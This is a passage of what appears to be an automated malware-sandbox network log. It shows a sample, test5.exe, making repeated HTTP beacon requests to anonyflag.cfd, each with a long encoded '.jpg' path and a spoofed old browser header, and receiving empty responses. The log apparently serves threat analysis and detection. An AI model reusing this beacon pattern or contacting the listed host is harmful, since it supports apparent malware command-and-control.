cfL4;desc="?proto=TCP&rtt=1642&min_rtt=1639&rtt_var=622&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1749550&cwnd=233&unsent_bytes=0&cid=8e9444b826ed4a10&ts=517&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49782	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:37:03 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:37:03 UTC	890	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:37:03 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:37:03 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=khN%2BAUx28vEzu%2BKLF1z1tvg%2BQWMj4NbEfo5yzPkDDTiUg%2Fddh5fb0gJaxg2d83odLi289%2BW7gYoGqm3oX%2B3nJlmd3o%2BT%2BteW4JuvTBngeQ%2BH2T%2BuiBVkxezSwjtqnWOE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e9b08b9d43ab-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1799&min_rtt=1739&rtt_var=695&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1679125&cwnd=221&unsent_bytes=0&cid=34d6b1838fade828&ts=513&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49785	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:37:05 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:37:05 UTC	876	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:37:05 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:37:05 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xMInd6OW1mpX4FhM8qDE77QzV2qHnukuNfXZsa%2FfkuE7n%2FJPJXOIbF2IjlguDt0cNvF6nadzulI4satzSpYKtihdBKy1A760u3RhdeA7wNPuFqYZc%2BQRj2BdcgcN4x0p"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e9bcbb73429e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2002&min_rtt=1953&rtt_var=767&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1495135&cwnd=208&unsent_bytes=0&cid=eb2e91d225eae11f&ts=512&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49789	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:37:06 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:37:07 UTC	880	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:37:07 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:37:07 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kcUt0ruJYWjnngNEqlYCb%2B8lv2KTkfqvFAsfST%2B3GxMtq%2FyL0Px%2Be6HKWWJbT1bwSWNPP186Lp3R4hQnfrIgyxb8557gruF9wwbepaV%2FUC7u4CsEZDcP68qb8FkQ09Mp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e9c81a090f7b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1492&min_rtt=1446&rtt_var=635&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1605277&cwnd=205&unsent_bytes=0&cid=0277bb370649f89e&ts=494&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49795	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:37:08 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:37:09 UTC	886	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:37:09 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:37:09 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OjAbnvmz0v%2Fjlr3Txt7tpcowIUnpa%2Bjgu%2B%2FCtVkjnBTrqHAgvci2%2BU04xcHyIxF2WaX%2FPL94zjz32zyeQPEgAdiYVO%2BpeaI6RC3lzjSx09L6eNFm7vdq6%2Fmdw4ljZaSB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e9d3688f424f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2046&min_rtt=2040&rtt_var=778&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1394460&cwnd=233&unsent_bytes=0&cid=900b3686d15e8218&ts=492&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49801	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:37:10 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:37:11 UTC	880	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:37:10 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: HIT Age: 1 Last-Modified: Sat, 28 Dec 2024 10:37:09 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sFFM4zSGXIKH5VFyfJrdF1v3ckUFCsSqmeowY6krhRa0G5fM5sy9MTE2CcN4cLQAKjgAg2fdvHu56Y2C1559mW2C7QpbLQXIwx0Bzz3JgUO2%2FWi%2FDv%2FNs27br537u1Ln"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e9deca8443c9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1708&min_rtt=1708&rtt_var=640&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1709601&cwnd=230&unsent_bytes=0&cid=1558d88f03ea14ac&ts=452&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49807	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:37:12 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:37:12 UTC	884	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:37:12 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:37:12 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q2UPrFh1rKfwRmW1%2BvgwJKX%2Fh1qHznr4IK02OUAsTkI3VSOBHy0xoF4mA%2FSACjnfhK3%2FTKQm1xpWA%2FljmUJ53VpfIh84AGhVYs0Z0x5LSfFl0v%2FzZMZ0ta1%2FUZHOP609"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e9ea3d158cb1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1961&min_rtt=1956&rtt_var=744&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1460730&cwnd=186&unsent_bytes=0&cid=88e5f6fb0f7dfab2&ts=516&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49813	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:37:14 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:37:14 UTC	872	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:37:14 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:37:14 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3iqqGOosSk2aCXSrc2RvXZsoifjpxuMp5xkfp8rL6WA7CXTj4m%2BUkjy0BJ8aAtOAWf9hFypbu09e0vYxXCr0buWwUB8czHKk2NFrxfI7LqvdtSUkSCo8OD6gsbkisg69"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e9f609ac41ed-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1585&min_rtt=1574&rtt_var=612&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1189&delivery_rate=1754807&cwnd=211&unsent_bytes=0&cid=fafee171f8c866b0&ts=500&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49815	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:37:16 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:37:16 UTC	880	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:37:16 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:37:16 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4fy7oCiG73O%2FSIefKN1qhWopqk%2FgKoB6vW00DrqueOgdMX0cWuHH%2Bxac5vZLbv0Va%2BtmdpET85ZZkFE6CfVSTtzSBrBWCVxvbN4bohSl09K2YG%2Bp7Urvk3zrDN8k9T95"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90ea01c8ff41a1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2027&min_rtt=2020&rtt_var=772&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1403846&cwnd=229&unsent_bytes=0&cid=e33d78032a4a8ed7&ts=505&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49821	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:37:18 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:37:18 UTC	875	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:37:18 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:37:18 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JZOHG3DJo8LuU7HmUi7eJQE%2BDsjduaYm8cW3s4IRGCAeqaIibvIDkvx8WNBncTPs2n7KTret19QoaxuVWsRONjls4Oiyqo%2BFw5VERDrkRTTGCdh8yWZOHw7A6FZybI%2F2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90ea0d8fe219aa-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1967&min_rtt=1965&rtt_var=742&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1468812&cwnd=32&unsent_bytes=0&cid=38f28d1bb634c68d&ts=501&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49826	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:37:19 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:37:20 UTC	880	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:37:20 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:37:20 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tnro8%2BKKr0Ucjhq%2BfwbYhOHVkDObwAz8pYTLX9C0k7d4fUGnZsNLWLUNp%2FKjr%2BLkprQ4UEEecHMQT7iYvZJz5PePVcYUhXKglgcx4iwefPidpWBSHXThEhNyM%2Bhg9Esb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90ea18e86e8c17-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1777&min_rtt=1769&rtt_var=680&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1590413&cwnd=240&unsent_bytes=0&cid=99ece412729a1960&ts=498&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49832	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:37:21 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:37:22 UTC	876	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:37:22 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:37:22 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OwMUxPFoHtMLqFKohjxRq%2FZDV48ClnUdWcYqwUUaJrYnvNu%2BIns0Fhkv3Sq78aqS6k4gsqpKR%2FRDXP7E56h3ui0eQZxEJ7Pl7HNC1mQOQx7BSWfGe9K8qhoHJHoGp26S"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90ea248a8d7cb1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1819&min_rtt=1819&rtt_var=684&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1599123&cwnd=235&unsent_bytes=0&cid=bed853743a0a1119&ts=503&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49838	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:37:23 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:37:24 UTC	886	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:37:23 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: HIT Age: 1 Last-Modified: Sat, 28 Dec 2024 10:37:22 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wlqXBwxzoCjfbhFZqW289Y8QzzNy%2FX7BDBqQB6diOehwgC%2B%2FMPZfeRCIZg8cT6rTCHzQ41sAdr0ja0uw7x6VmSUSwJSq%2FFlwZPNXkG%2F5BDeYMRKv0CSG%2Bm3SphdMY8r4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90ea30389aef9f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1999&min_rtt=1957&rtt_var=764&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1492079&cwnd=219&unsent_bytes=0&cid=6e47d755d414e3b2&ts=456&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49844	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:37:25 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:37:25 UTC	872	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:37:25 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:37:25 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DGLV2Znrf7hUkQ5ihtb1CSPfdPNmDgjRMPmx6Ai589p5rXCBGZFZ7jZvKMEJVkew23EyzdZXpl2%2FeqEFPZYhLCKohzplq4BHQK1rpeEIBJEXDzBxt0w2ZiANQYJWvH3p"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90ea3b5fa343fd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1666&min_rtt=1662&rtt_var=632&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1189&delivery_rate=1720683&cwnd=217&unsent_bytes=0&cid=a5ce4d60f9c81d20&ts=495&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49846	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:37:27 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:37:27 UTC	876	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:37:27 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:37:27 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lW%2Fhl4rva12zLIzNY5hxssriVRDHHOeFRPVXwPrgpDhe5Wn3A6efwIabZ9HMYVbEDUsgnAb61X24g%2BpJsmtMg0zfQsytDzfxveSHKYAK5gyRb4z858%2Fc5xALY48qkvDC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90ea47190341ec-EWR alt-svc: h3=":443"; ma=86400 server-timing: 